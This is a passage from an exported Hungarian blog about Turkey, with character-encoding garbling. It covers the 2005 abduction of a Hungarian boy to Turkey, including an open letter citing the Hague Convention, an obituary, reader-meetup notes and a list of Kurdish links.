nyilatkozatot tett, aztבn a tצrצkצk anyakצnyvezik a magyar בllampolgבr kisfiתt, aki -miutבn apja יs cinkosai kicsempיszik Magyarorszבgrףl - szeptemberben megkapja a tצrצk בllampolgבrsבgot. Erről azonban mostanבig Tצrצkorszבgban nem tudtak azok, akiknek kellett volna, םgy hבt nem tudtבk megmondani tavaly novemberben Ankarבban a Tysz-gyben segםtsיget kיrő magyar klgyminiszternek, יs Gyurcsבny miniszterelnצknek sem a mבjusi budapesti Erdogan-lבtogatבs alatt.<br /><br />Eddig csak egy Tצrצkorszבgot ismertnk.<br /><br />Azt, amelynek kיpviselői januבrban Budapesten tבrgyaltak, s a magyar klgyi szףvivő januבr 11-i sajtףnyilatkozata szerint „jeleztיk, hogy nagy erőkkel igyekeznek felkutatni Mehmet Tysz Kבroly hollיtיt, a tצrצk konzuli delegבciף vezetője pedig megerősםtette azt a korבbbi informבciףt, amely szerint sem a kisfiת, sem pedig יdesapja nem tartףzkodik Tצrצkorszבgban”. A tבrgyalבson „a tצrצk fיl hangsתlyozta, hogy nagy erőkkel igyekeznek felkutatni a kisfiת tartףzkodבsi helyיt יs ennek יrdekיben a tצrצk gyיszsיg, a rendőrsיg יs az idegenrendיszeti hatףsבgok komolyan dolgoznak".<br /><br />Valamelyik Tצrצkorszבgban aztבn mבjus 19-יn papבt יs fiבt tצrצk תjsבgםrף fיnykיpezi a vidבmparkban, s az apa az תjsבgnak elismeri, hogy tavaly jתliusban elhozta Karcsikבt Magyarorszבgrףl, de mint mondja, az igazsבg az ő oldalבn בll, mert a kisfiתt Magyarorszבgon keresztיny hitben akartבk nevelni, disznףhתssal etettיk, magyar יlettבrsa meg amתgy is בtvבgta, nem maradt tehבt mבs vבlasztבsa. Lebarnםtja mיg Tצrצkorszבgot - az egyiket - , hogy nem בllt mellיje, meg a magyarokat is, hogy Budapesten fיlrevezettיk valamelyik tצrצk miniszterelnצkצt.</div><div align="justify"><br />A kisfiתt azףta sem talבltבk meg meg egyik Tצrצkorszבg hatףsבgai sem.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">Mentő kצrlmיny, ahogy a Magyar Hםrlap תjsבgםrףja megfogalmazta: „a horvבt rendőrצk is bבrhogy igyekeznek, nem talבljבk Ante Gotovinבt, pedig Horvבtorszבg sokkal kisebb, mint Tצrצkorszבg, Gotovina pedig sokkal nagyobb, mint Karcsika”.<br /><br /></div><div align="justify"><strong><span style="font-size:130%;"></span></strong></div><div align="justify"><strong><span style="font-size:130%;">2005. mבjus 25.</span></strong></div><div align="justify"><strong><span style="font-size:130%;"></span></strong><br /></div><div align="justify"><strong><span style="font-size:130%;"></span></strong></div><div align="justify">Ma az Aksyon hetilap ismיtli meg a Tysz-gy Zaman-fיle vבltozatבt. Nem vיletlenl, a kiadףi hבttיr ugyanaz. A cikk cםme: "Az EU-tagsבg בra egy tצrצk". <a href="http://www.aksiyon.com.tr/detay.php?id=21643&amp;yorum_id=1">LINK ITT</a></div><div align="justify"><br /></div><div align="justify"><strong><span style="font-size:130%;"></span></strong></div><div align="justify"><strong><span style="font-size:130%;">2005. mבjus 24.</span></strong></div><div align="justify"><br /></div><div align="justify"><strong><span style="font-size:130%;"></span></strong></div><div align="justify">ֹrdekes fejlemיnyről םr a Zaman mai szבma: az apa, Mehmet Tysz gyvיdje szerint Erdogan miniszterelnצkצt a magyarok megtיvesztettיk a kisfiתval kapcsolatban. Az gyvיd pedig hiבba szeretnי elmondani neki az igazsבgot, nem jut hozzב az gy irataihoz, mert az isztambuli rendőrsיg nem adja oda neki azokat. A lap azt בllםtja, hogy az egyik isztambuli kerleti gyיszsיg ezיrt előzetes vizsgבlatot indםtott az iratok visszatartבsביrt felelős rendőri vezető ellen.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify"></div><div align="justify">A cikk <a href="http://www.zaman.com.tr/?bl=haberler&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;alt=&trh=20050524&amp;hn=176181">EZEN A LINKEN</a> olvashatף.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">A <a href="http://www.miniszterelnok.hu/gss/alpha?do=2&pg=11&amp;m9_doc=408&m8_curr=1">miniszterelnok.hu</a> oldalon lבthatod, <strong>mit mondott Erdogan Budapesten, mבjus 12-יn.</strong></div><div align="justify"><br /></div><div align="justify"></div><div align="justify"><strong>Mבs םrבsok:</strong></div><div align="justify"><br /></div><div align="justify"></div><div align="justify"><a href="http://www.delmagyar.hu/cikk.php?id=70&amp;cid=97198">Szlők kצzצtt hבnykolףdva</a> Dיlmagyarorszבg, mבjus 24.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify"><strong><span style="font-size:130%;">2005. mבjus 23.</span></strong></div><div align="justify"><br /></div><div align="justify"><strong><span style="font-size:130%;"></span></strong></div><div align="justify">Talבn nem mindenki ismeri Mehmet Tysz Kבroly יdesanyja יs a magyar Női- יs Gyermekjogi Kutatף יs Oktatף Kצzpont nyםlt levelיt, amelyet februבr 16-בn adtak בt a tצrצk nagykצvetnek, majd a mיdiבnak.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">Tehבt a levיl:</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">Budapest, 2005. February 16.</div><div align="justify"><br />OPEN/PUBLIC LETTER<br /><br />His Excellency<br />Mr. Umur Apaydin<br />Ambassador of Turkey<br />Cc.<br />Thomas Glaser<br />Head of Delegation<br />European Commission Hungary<br /><br />Subject: How can an 8 years old Hungarian boy completely disappear in Turkey?<br /><br />Excellency,<br /><br />We are very sorry, indeed, that Yourself or Your Embassy have not responded to our three previous letters. This is why we had to turn to the general public and ask for the co-operation of the Hungarian as well as international media/press.<br /><br />We would very much appreciate your statement and comments regarding Turkey's past, present and future steps towards the safe return of 8 years old Tysz Mehmet Kבroly, who was kidnapped from Hungary to Turkey. We would like to emphasise that Turkey has an international obligation to return the child to Hungary under the so-called Hague Convention, - on the Civil Aspects of International Child Abduction.<br /><br />As Yourself and the Turkish authorities are fully aware, the father of the little boy, a Turkish-Hungarian citizen failed to return the child to his mother and to his residence in Hungary, following parental visitation, on 11 July 2004. Soon it was a proven fact, that the father smuggled the child to Turkey, with false passport and through an well-organised chain of criminal activities.<br /><br />The criminal proceedings regarding the above criminal activities are in an advanced stage, the investigation was completed, the above-summarised facts were found. At this point an international arrest warrant is in effect against Tysz Mehmet (senior).<br /><br />In addition to the criminal proceedings with international aspects the Hungarian Ministry of Justice, upon the request of the mother, initiated the relevant civil proceedings under the Hague Convention, in accordance with the letter and the spirit of the Convention.<br /><br />The main aim of the Hague Convention on International Child Abduction is the following, according to the text of the Convention:<br /><br />' to secure the prompt return of children wrongfully removed to or retained in any Contracting State' (Article 1. a,)<br /><br />According to Article 7 of the Convention Turkey is (would be) obliged to take all appropriate measures to find the child:<br /><br />Central Authorities shall co-operate with each other and promote co-operation amongst the competent authorities in their respective States to secure the prompt return of children and to achieve the other objects of this Convention.</div><div align="justify"><br />In particular, either directly or through any intermediary, they shall take all appropriate measures -<br /><br />A, to discover the whereabouts of a child who has been wrongfully removed or retained<br /><br />According to Article 11 of the Convention the procedure is extremely speedy, as a main rule it should take less than 6 weeks - may we remind you that in our case more than 7 months have passed:<br /><br />'The judicial or administrative authorities of the Contracting States shall act expeditiously in proceedings for the return of children.<br /></div><div align="justify"><br />If the judicial or administrative authority concerned has not reached a decision within six weeks from the date of commencement of the proceedings, the applicant or the Central Authority of the requested State, on its own initiative or if asked by the Central Authority of the requesting State, shall have the right to request a statement of the reasons for the delay.'<br /><br />Our questions are the following:</div><div align="justify"><br />1. 1. The father, Tysz Mehmet (senior) can be reached by anybody at his Turkish phone number. (This fact can be checked by the Hungarian and international press, the general public.) How is it possible that in spite of the international arrest warrant nothing has been happening towards the localisation of the father and through that step the finding of the child?</div><div align="justify"><br />2. With a view to the Hague Convention which specific authorities have taken what specific steps towards discovering the (allegedly unknown) whereabouts of the child? What steps are planned/envisaged by the authorities in the near future?</div><div align="justify"><br />3. At the early stages of the proceedings the Istanbul based so called 'children's police' was working on the discovery of the child's whereabouts, with outstanding specialised skills. The case was at some point withdrawn/taken away from this special police force, and at this stage apparently no authority does anything towards the discovery of the whereabouts of the child. How is this possible? Which authority is in charge of the case at this point, and why was the case withdrawn/taken away from the specialised children's police? </div><div align="justify"><br />4. The passivity of the Turkish authorities; the complete neglect of the obligations listed in the Hague Convention; the removal of the case from the specialised children's police; the 'leaving alone the father' attitude in spite of the international arrest warrant are factors, that give a totally false image about the state of affairs in Turkey. This image is not the image of a European Union candidate country, a state based on the Rule of Law, but instead, the false image is that there is a situation of 'lawlessness' and arbitrariness. Unfortunately some people even falsely conclude from all these circumstances that there may be some sort of conspiracy, even a corrupt relationship between the Turkish authorities and the abductor. Of course we fully reject this unfair and ill-founded conclusion. Excellency, would you not consider to challenge these unfounded, false images in order to maintain the good reputation of your country?</div><div align="justify"><br />5. How is it possible that there is such a poor co-operation between a European Union member state (Hungary) and a European Union candidate state (Turkey) in the context of an EU obligation (immediate discovery of the whereabouts of a disappeared/wrongfully-removed child)? (Please note that in addition to the international obligation under the Hague Convention there is also a similar state obligation within the EU framework.)<br /><br />Excellency, our aim is nothing more - but nothing less, either - than to achieve the discovery of the whereabouts of the abducted child as well as to achieve his safe return to Hungary, his habitual residence, in order to reunite him with the mother. The mother could not communicate at all with the little boy in the last 7 months and this situation is intolerable to her. The same is obviously true about the situation of the little boy. We are asking for Your Excellency's personal commitment to and intervention towards the effective implementation of the Hague Convention in this case, in order to achieve the safe return of the child to his mother, to his habitual residence.</div><div align="justify"><br />The prompt successful conclusion of this case is not only the interest of mother and child but also the interest of both democratic states based on the Rule of Law - Turkey and Hungary.<br /><br />Sincerely yours<br /><br />Bogosnי Pap Edina<br />Mother of the little boy</div><div align="justify"><br />Dr. Morvai Krisztina Head of WRCR Center</div><div align="justify"></div><div align="justify"><br /></div><div align="justify"></div><div align="justify"></div><div align="justify"><strong><span style="font-size:130%;"></span></strong></div><div align="justify"><strong><span style="font-size:130%;">2005. mבjus 21.</span></strong></div><div align="justify"><strong><span style="font-size:130%;"></span></strong><br /></div><div align="justify"></div><div align="justify">Ahogy tegnap megjףsoltam, a Zaman mai szבmבban folytatja a tצrצk kצzvיlemיny megdolgozבsבt יs elmesיli, hogyan sikerlt Mehmet Tysznek megszצktetni Karcsikבt. Az apa tצrtיnete a kצvetkező: Megיrkezik Amerikבbףl Magyarorszבgra, s lבtja, hogy magyar felesיge azףta תjra fיrjhez ment, s megszerezte a gyermek szlői felgyeleti jogבt. Ezיrt aztבn 2004. jתlius 9-יn fogja az utcבn jבtszadozף kisfiתt יs autףstoppal lelיp vele Budapestről, majd hosszan gyalogolnak a szerb hatבrig. Az יjszakבt egymבst בtצlelve a mezőn tצltik. Az יhsיgtől majd meghalnak, a fבradtsבgtףl mבr beszיlni sem bםrnak. Ekkor felbukkan a magyar Varga csalבd autףja, s a kedves magyar emberek megetetik, megitatjבk a meneklőket. Az apja nyakבban lףgף kis Mehmet (Karcsikבt mבr םgy hםvjבk) ekkor elmesיli, hogy יdesanyja יs mostohaapja verni szokta, s kצnyצrצg apjבnak יs Vargביknak, hogy ne vigyיk vissza hozzבjuk. Vargביk jף emberek lיvיn, eztבn menten elszבllםtjבk apבt יs fiבt Edirnיbe. A papa tצrצk fצldre יrvיn elrebeg egy imבt, majd megfogadja, hogy a Selimiye dzsבmiban ezt megismיtli, snitt, mבr ott is vannak.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">A dzsבmiban azonban fבjdalmas meglepetיs יri: a kis Mehmet, aki addig templomba jבrt, a dzsבmiban a gyertyבt keresi. Az apa ekkor ismיt hבlבt ad Allahnak, hogy elhozta a gyauroktףl Mehmetet s nyomban felvilבgosםtja a kisfiתt az iszlבm mibenlיtיről. Felhםvja tovבbbב a gyermek anyjבt, elmondja, hogy Tצrצkorszבgban vannak, de a fiתt nem akarja anyjבtףl elszakםtani, ezיrt megבllapodבst javasol. (Hogy milyet, az a cikkből nem derl ki.)</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">Innentől fogva a kisfiת megszצktetיsיből nemzeti gy kerekedik Magyarorszבgon. A magyar mיdia szinte naponta vבdaskodik Tצrצkorszבg ellen, majd a helyzet kulminבl: a magyarok Tצrצkorszבg eurףpai uniףs csatlakozבsבnak tבmogatבsבt a gyermek visszaadבsבtףl teszik fggővי, Gyurcsבny miniszterelnצk pedig Budapesten Recep Tayyip Erdogבntףl kיri "Mehmet" kiadatבsבt.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">A kis Mehmet azonban - aki mבr a Tצrצkorszבgba יrkezיse utבni hיten megszerezte a tצrצk בllampolgבrsבgot - vיgtelenl boldog, hogy יdesapjבval lehet, s nem akar Magyarorszבgra menni. Itt aztבn vיge a cikknek is, ki-ki tצrצlgesse a kצnnyeit יs gondolkozzon azon, vajon nem kellene-e ezt a tצrtיnetet megfilmesםteni.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">Mehmet Tysz - יrthető mףdon - legalבbb kיt rיszletet elfelejtett megosztani a Zamannal.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">Az egyik, azok a bizonyos jף magyar emberek, akiknek annyira megesett a szםve szegיny kisfiתn, hogy meg sem בlltak vele Edirnיig. Nos, ellenk, meg mבs magyar segםtőtבrsaik ellen ma bntetőeljבrבs folyik Magyarorszבgon embercsempיszיs vבdjבval. Karcsika papבja ugyanis - mיg mielőtt "rבtalבlt volna" utcבn jבtszadozף gyermekיre - tצbb magyar jףindulatבt is megvבsבrolta nיmi pיnzיrt, akik aztבn Karcsika fיnykיpיvel hamis תtlevelet kיszםtettek יs kicsempיsztיk - apjבval egytt - az orszבgbףl.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">A mבsik Karcsika tצrצk בllampolgבrsבga. Ha igaz, amit az apa בllםt, akkor a tצrצk hatףsבgok bajban vannak. A tצrצk jog szerint ugyanis az - amתgy magyar בllampolgבr - kisfiתt anyja kifejezett hozzבjבrulבsa nיlkl nem lehet Tצrצkorszבgban anyakצnyvezni, mבrpedig nehezen feltיtelezhető, hogy az anya ehhez engedיlyיt adta.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">A Zaman mai cikke <a href="http://www.zaman.com.tr/?bl=haberler&alt=&amp;trh=20050521&hn=175221">EZEN A LINKEN</a> talבlhatף.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify"></div><div align="justify"></div><div align="justify"><strong>Olvasnivalף:</strong></div><div align="justify"><br /></div><div align="left"><a href="http://www.nol.hu/cikk/363203/">"Szeretnיm, ha az gyemben tצrצk bםrףsבg dצntene"<br />- mondja Mehmet Kבroly apja</a> Nיpszabadsבg, mבjus 23.</div><div align="left"><a href="http://www.delmagyar.hu/cikk.php?id=70&amp;cid=97044">Az יdesanya szerint nem igaz a hםr</a> Dיlmagyarorszבg, mבj. 21.</div><div align="left"><strong></strong></div><div align="left"></div><div align="left"><a href="http://www.online.rtlklub.hu/hirek/vilagunk/?id=0505200859">Hazakerlhet Karcsika</a> RTL KLlub mבjus 21.</div><div align="left"><a href="http://www.nol.hu/cikk/363016/">Egy tצrצk תjsבg megtalבlta az "ellopott" Mehmet Kבrolyt </a>Nיpszabadsבg mבjus 21.<br /><br /></div><div align="justify"></div><div align="justify"><strong><span style="font-size:130%;">2005. mבjus 20.</span></strong></div><div align="justify"><br /></div><div align="justify"></div><div align="justify">Amire a tצrצk hatףsבgok 10 hףnapig nem voltak kיpesek, azt megtette a sajtף: Ahmet Dצnmez, a Zaman napilap munkatבrsa Isztambulban "megtalבlta" Karcsikבt, az apa pedig - első םzben - elismerte, hogy tavaly jתliusban megszצktette Magyarorszבgrףl a kisfiתt יs azףta is bתjtatja. A ma megjelent cikk יs Karcsika fיnykיpe <a href="http://www.zaman.com.tr/?bl=haberler&amp;amp;amp;alt=&trh=20050520&amp;hn=174930">EZEN A LINKEN</a> lבthatף, יppen a vidבmparkban mתlatjבk - szigorת illegalitבsban - az időt.</div><div align="justify"><br /></div><div align="justify">Karcsika - az תjsבgםrף szerint - nem akar hazamenni Magyarorszבgra (ez szיp, kיpzeljk el, hogy az ellenkezője jelenik meg a lap cםmlapsztorijבban).</div><div align="justify"><br /></div><div align="justify">Az apja tבjיkoztatni akarja Erdogan miniszterelnצkצt a "valףs helyzetről", mert szerinte Karcsika anyja fיlrevezetett mindkit, nemcsak őt, hanem a magyar bםrףsבgot is, s Erdogant is fיlretבjיkoztattבk. </div><div align="justify"><br /></div><div align="justify">Az apa sיrelmezi, hogy mikצzben a magyar hatףsבgok egy יve "nemzeti gynek" tekintik, hogy a kisfiת hazajuthasson Magyarorszבgra, Tצrצkorszבg nem בllt az apa יs fia mellי (ez az eszmei mondanivalף). Nota bene, az apa magyar יs tצrצk kettős בllampolgבr.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">Azon meg klצnצsen megbotrבnkozott, hogy Magyarorszבgon keresztיnnyי akartבk nevelni a fiבt, sőt, disznףhתst etettek vele. ֽgy aztבn, mondja ő, nem maradt mבs vבlasztבsa, mint megszצktetni a gyereket.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">Az תjsבgםrף szerint a magyarok mיg Tצrצkorszבg uniףs csatlakozבsבnak tבmogatבsבt is Karcsika visszaadבsבtףl teszik fggővי, ez a cikk cםme is egyיbkיnt. (Igaz, ami igaz, a kיt gyerekrablבsi gy kezelיse - Raskף Szofiי יs Karcsikבי - jףcskבn ronthatott - יs mיg ronthat - a tצrצkצk megםtיlיsיn Magyarorszבgon, nagy kבr, hogy Ankarבban ezt nem ismertיk fel időben.)</div><div align="justify"><br /></div><div align="justify">Az apa tצrצk gyvיdje azt בllםtja, hogy a magyar fיl politikai eszkצzצkkel igyekszik megoldani egy jogi gyet.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">Szףval, ez a helyzet mבjus 20-בn. </div><div align="justify"><br /></div><div align="justify"></div><div align="justify">Erdogan mבjus 12-i budapesti lבtogatבsa utבn sok tצrצk תjsבg megםrta, hogy a magyar miniszterelnצk kיrte Karcsika felkutatבsבt יs visszaadבsבt, amit a tצrצk miniszterelnצk meg is םgיrt.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">Ne gondoljuk, hogy a tצrצk תjsבgםrף gyesebben nyomoz a rendőrnיl - Karcsikבt a hatףsבgok eddig egyszerűen nem akartבk megtalבlni.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify"></div><div align="justify">A kisfiת apja יs azok, akik neki korבbban falaztak, most תgy gondolhattבk, jobb, ha a tצrצk sajtף "megleli" Karcsikבt יs rבrepl az gyre. Valףszםnű, hogy a napokban a hangulatkeltיs folytatףdik, s megismerkedhetnk szegיny kisfiת megkeresztelיsיnek, bיrmבlבsבnak יs a disznףhתssal folytatott hadakozבsבnak tovבbbi rיszleteivel, hadd tudja meg a tצrצk nיp, mit kell gondolni egy olyan miniszterelnצkről, aki ki akar adni egy derיk mozlimot a gyauroknak.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">De ez mבr utףvיdharc, תj helyzet van. A tצrצk rendőrsיg tצbbי nem hivatkozhat arra, hogy az apבnak fogalma sincs arrףl, hol a gyerek (mבrciusig mיg azt בllםtottבk, hogy az apa sincs Tצrצkorszבgban). A tצrצk igazsבggyi hatףsבgoknak - ha mבr egyszer a fiת előkerlt - foglalkozniuk kell a hבgai egyezmיny alapjבn folyף magyar kiadatבsi kיrelemmel, יs meg kell akadבlyozniuk, hogy Karcsika ismיt eltűnjצn. A tצrצkצknek azt is biztosםtaniuk kell, hogy a magyar nagykצvetsיg talבlkozhasson Karcsikבval יs ellבthassa יrdekeinek vיdelmיt, mivel ehhez joga van. </div><div align="justify"><br /></div><div align="justify">A kisfiת tצrtיnetיről a blogon <a href="http://torokorszag.blogspot.com/2004/08/jabb-magyar-gyermekrabls-trkorszgban.html">EZEN A LINKEN</a> olvashatsz. A Raskף Szofi sztori pedig <a href="http://torokorszag.blogspot.com/2004/08/rask-szofi-trtnete.html">EZEN A LINKEN</a> van.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify"><em>Amתgy meg szerencsיs vagy, ha a blogot olvasod, itt jelentek meg (eddig) előszצr Magyarorszבgon a Raskף Szofival יs Mehmet Tysz Karcsikבval kapcsolatos tצrצkorszבgi hםrek.</em></div><div align="justify"><br /></div><div align="justify"></div><div align="justify"><strong>Olvasnivalף:</strong></div><div align="justify"><br /></div><div align="justify"></div><div align="justify"><a href="http://napihirek.fuggetlenhir.hu/modules.php?name=fhonline&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;func=hir&hir[nid]=32929&amp;authid=ba31afcf9868449b434ac022a851ac34">Tצrצk apjבnבl van Karcsika - a keresztיny nevelיs volt a baj</a> Fggetlen Hםrgynצksיg mבjus 20.</div><div align="justify"><a href="http://index.hu/politika/bulvar/mehmet0520/">Megtalבltבk Tצrצkorszבgban Mehmet Karcsikבt</a> Index mבjus 20.</div><div align="justify"><a href="http://www.klubradio.hu/cikk.php?id=16&cid=15380">Megtalבltבk Tצrצkorszבgban az eltűnt magyar kisfiתt</a> Klubrבdiף mבjus 20.</div><div align="justify"></div><div align="justify">Karcsikבval kapcsolatos előzmיnyek <a href="http://www.blogger.com/post-edit.g?blogID=7074887&amp;postID=109385449902022618">EZEN A LINKEN</a>. AKKOR MOST MI IS TײRTֹNT EGY ֱLL׃ ֹV ALATT?</div><div align="justify"></div> -false - - - - -Efendi - -2005-03-09T09:18:00+01:00 -2005-03-11T16:17:39Z -2005-03-09T08:24:35Z - -tag:blogger.com,1999:blog-7074887.post-111035667537321812 -In Memoriam dr. Fehיr Gיza - -
    -
    -Valamennyien bתcsתzunk Tőle, akik szerettk - a tudףst, a Magyar-Tצrצk Barבti Tבrsasבg alapםtף, majd tiszteletbeli elnצkיt. -
    - -
    -
    -
    Februבr 21-יn, 88. יletיvיben elhunyt dr. Fehיr Gיza, a Magyar Nemzeti Mתzeum nyugalmazott tudomבnyos főmunkatבrsa, a magyarorszבgi tצrצk emlיkek nemzetkצzileg elismert kutatףja, a magyar-tצrצk tudomבnyos יs kulturבlis kapcsolatok tevיkeny előmozdםtףja.
    -
    -
    A Balkבn יs a Kelet kultתrבjבval mבr gyermekkorבban megismerkedett, hiszen יdesapja, a kivבlף rיgיsz a kיt vilבghבborת kצzצtt tצbbnyire Bulgבriבban dolgozott, majd 1942-től 1947-ig Isztambulban יlt, ahovב fia is kצvette.
    -
    -
    -
    -
    -
    Hazatיrte utבn Fehיr Gיza a Nemzeti Mתzeumba kerlt, ahol a hףdoltsבg kori rיgיszeti יs művיszeti emlיkek feltבrבsa יs tudomבnyos feldolgozבsa volt a feladata. Szבmos rיgיszeti בsatבst vezetett, kצzצlte a mתzeum tצrצk iparművיszeti gyűjtemיnyיt – tצbbek kצzצtt a hםres tצrצk sבtort יs bőrkצpenyt is.
    -
    -
    -
    -
    -
    Tudomבnyos munkבssבgבnak egyik kimagaslף eredmיnye a magyar tצrtיnelemre vonatkozף tצrצk miniatתrבk alapos feldolgozבsa יs kצzzיtיtele, amellyel sajבtsבgos תj forrבscsoportot vont be kצzיpkori tצrtיneti kutatבsunk kצrיbe.
    -
    -
    -
    -
    Fבradhatatlanul dolgozott a tצrצk יs a magyar szakemberek kצzti tudomבnyos kapcsolatok elmיlyםtיsייrt, azokban az időkben is, amikor a kיt orszבg kצzt alig volt hivatalos kapcsolat.
    -
    -
    -
    -
    -
    Tekintיlyes tagja volt a Tצrצk Tצrtיneti Tבrsasבgnak, בllandף rיsztvevője יs előadףja a nemzetkצzi tצrצk tצrtיneti יs művיszeti kongresszusoknak. 1975-ben ő rendezte meg nagy sikerrel Budapesten a tצrצk művיszeti kongresszust s szerkesztette az előadבsokat kצzzיtevő kצtetet. Tudomבnyos יs tudomבnyszervező tevיkenysיgיt a magyar יs a tצrצk בllam tצbb kitntetיssel ismerte el.
    -
    -
    Halבla nagy vesztesיg mind a magyar, mind a tצrצk tudomבnyossבgnak.
    -
    Fodor Istvבn
    -
    - -false - - - - -Efendi - -2005-03-08T21:21:00+01:00 -2005-09-23T10:48:12Z -2005-03-08T20:21:33Z - -tag:blogger.com,1999:blog-7074887.post-111031329332108279 -Tצrצkorszבg יs a blog barבtainak talבlkozףi - -
    - -
    -
    -
    A blog יs Tצrצkorszבg barבtainak első talבlkozףja a Kicsiavilבg teבzףban volt, 2005. mבrcius 5-יn. A rיsztvevők nevיt a kיpalבםrבsra klikkelve, a tצbbi fotףt pedig EZEN A LINKEN lבthatod, hבla Katicבnak. A mבsodik talבlkozף ֹvבnבl volt, בprilis 24-יn. A tצbbit mבr nem szבmoljuk.
    -
    -

    -
    -
    Ezen a poston folyik a talבlkozףk technikai szervezיse.
    -
    - -false - - - - -Efendi - -2005-01-04T01:46:00+01:00 -2006-01-02T14:21:25Z -2005-01-04T00:05:00Z - -tag:blogger.com,1999:blog-7074887.post-110479710092424037 -Tצrצk hבzastבrs - 2005. - -
    -
    Sok lבtogatףt יrdekel a kapcsolatteremtיs lehetősיge azokkal, akiknek tצrצk barבtjuk/partnerk/hבzastבrsuk van.
    -
    -
    -
    -Ebben a tיmבban 2005. januבr 4. utבn a "Tצrצk hבzastבrs - 2005." postban szףlhatsz hozzב (azaz ebben a rovatban, amelyet most olvasol), mםg a 2004. יvi vיlemיnyeket EZEN A LINKEN olvashatod.
    -
    -
    -
    -
    Ezt a postot bבrki olvashatja a weben, ezיrt azt tanבcsolom, hogy ha hozzבszףlsz, ne adj meg magadrףl sok szemיlyes adatot, elיg egy mיlcםm is ahhoz, hogy mבsok kapcsolatot teremthessenek veled. Ahogy a bevezető postban is םrtam, a blog szerkesztőjekיnt biztosםtalak arrףl, hogy a velem kצzצlt szemיlyes adataidat - hacsak arra tצrvיny nem kצtelez - senkinek nem hozom tudomבsבra.
    -
    -
    -
    -
    -Egy kedves magyar levelező, Ildi kיrt arra, hogy csinבljak egy kis reklבmot Gצremיben 2004. decembere vיgיn megnyitott panziףjבnak, amelyet tצrצk fיrjיvel műkצdtet. ײrצmmel teszem, nemcsak neki, bבrki mבsnak is, tehבt, mielőtt Kappadףkiבba utaznבl, keresd Ildi panziףjבt - - - -EZEN A LINKEN - - - -! - -
    -
    -
    -false -
    - - - -Efendi - -2004-12-04T05:54:44+01:00 -2004-12-07T19:18:44Z -2004-12-04T16:58:57Z - -tag:blogger.com,1999:blog-7074887.post-110217953756673220 -Kurd linkajבnlף -<div align="left"><strong><span style="color:#ff0000;">1. EMBERI JOGOK, POLITIKA, HֽREK:</span></strong> <br /> <br /><a href="http://www.khrp.org/">Kurdish Human Rights Project</a> <br /> <br /><a href="http://www.kurd.org/">Washingtoni Kurd Intיzet</a> <br /> <br /><a href="http://www.kurdistan.org/">American Kurdish Information Network</a> (AKIN) <br /> <br /><a href="http://www.kncna.org/docs/main.asp">Kurdish National Congress of North America</a> (KNCNA) <br /> <br /><a href="http://www.kurdishinstitute.be/cat.php?ID=3">Kurdish Institute of Brussels</a> <br /> <br /><a href="http://www.institutkurde.org/tun3.htm">Institut Kurde de Paris</a> <br /> <br /><a href="http://jindar.hypermart.net/">Kurdish Institute of Stockholm</a> <br /> <br /><a href="http://www.kurdishlibrary.org/">Kurdish Library/Kitיbxaneya Kurdi</a> <br /> <br /><a href="http://www.kurdmedia.com/">Kurdish Media - United Kurdish Voice</a> <br /> <br /><a href="http://home.cogeco.ca/~kurdistanobserver/news.html">Kurdistan Observer</a> <br /> <br /><a href="http://www.xs4all.nl/~tank/kurdish/htdocs/">Kurdish Information Network</a> <br /> <br /><a href="http://www.rojname.com/index.php">Rojname News Network</a> <br /> <br /><a href="http://www.info-turk.be/homepage.htm">Info-Trk</a> <br /> <br /><a href="http://www.ekurd.net/">Kurd Net</a> <br /> <br /><a href="http://www.kurdishinfo.com/">Kurdish Info</a> <br /> <br /><a href="http://hosting.afp.com/clients/ikp/francais/actu/index.html">AFP - Kurd hםrek</a> <br /> <br /><a href="http://www.hakpar.org.tr/anasayfa.asp">HAK-PAR</a> <br /> <br /><a href="http://www.hadep.org.tr/">HADEP</a> <br /> <br /><a href="http://www.institutkurde.org/cildekt/index.html">Leyla Zana - Comitי International pour la Libיraton des Dיputיs Kurdes Emprisonnיs en Turquie</a> <br /> <br /><span style="color:#ff0000;"><strong>2. KײNYV, TUDOMֱNY ֹS ILYESMI</strong></span> <br /> <br /><a href="http://www.let.uu.nl/~martin.vanbruinessen/personal/publications/Aga_Seyh_Devlet.htm">Martin van Bruinessen: Aga, Seyh, Devlet</a> <br /> <br /><a href="http://www.let.uu.nl/~martin.vanbruinessen/personal/publications/innerkurdische_herrschaft.htm">Martin van Bruinessen: Innerkurdische Herrschaftsverhהltnisse: Stהmme und religiצse Brderschaften</a> <br /> <br /><a href="http://www.let.uu.nl/~martin.vanbruinessen/personal/publications/Kurds,%20states,%20tribes.htm">Martin van Bruinessen: Kurds, states, and tribes</a> <br /> <br /><a href="http://www.nadir.org/nadir/initiativ/kurdi-almani-kassel/aktuell/1999/juli99/bruinessen.htm">Martin van Bruinessen: ײcalans Balance zwischen den "Zivilisten" und den "Militהrs"</a> <br /> <br /><a href="http://www.let.uu.nl/~martin.vanbruinessen/personal/cv-text-eng.html">Kicsoda Martin van Bruinessen?</a> <br /> <br /><a href="http://www.krg.org/reference/book-annotations.asp">A Modern History of the Kurds</a>, David McDowall, 2001 <br /> <br /><span style="color:#ff0000;"><strong>3. NET</strong></span> <br /> <br /><a href="http://dmoz.org/Society/Ethnicity/Asian/Middle_Eastern/Kurdish/">DMOZ OPEN DIRECTORY</a> <em>az egyik צnkיntes szerkesztőre 2004. novemberיben első fokon 6 יs fיl יv bצrtצnbntetיst 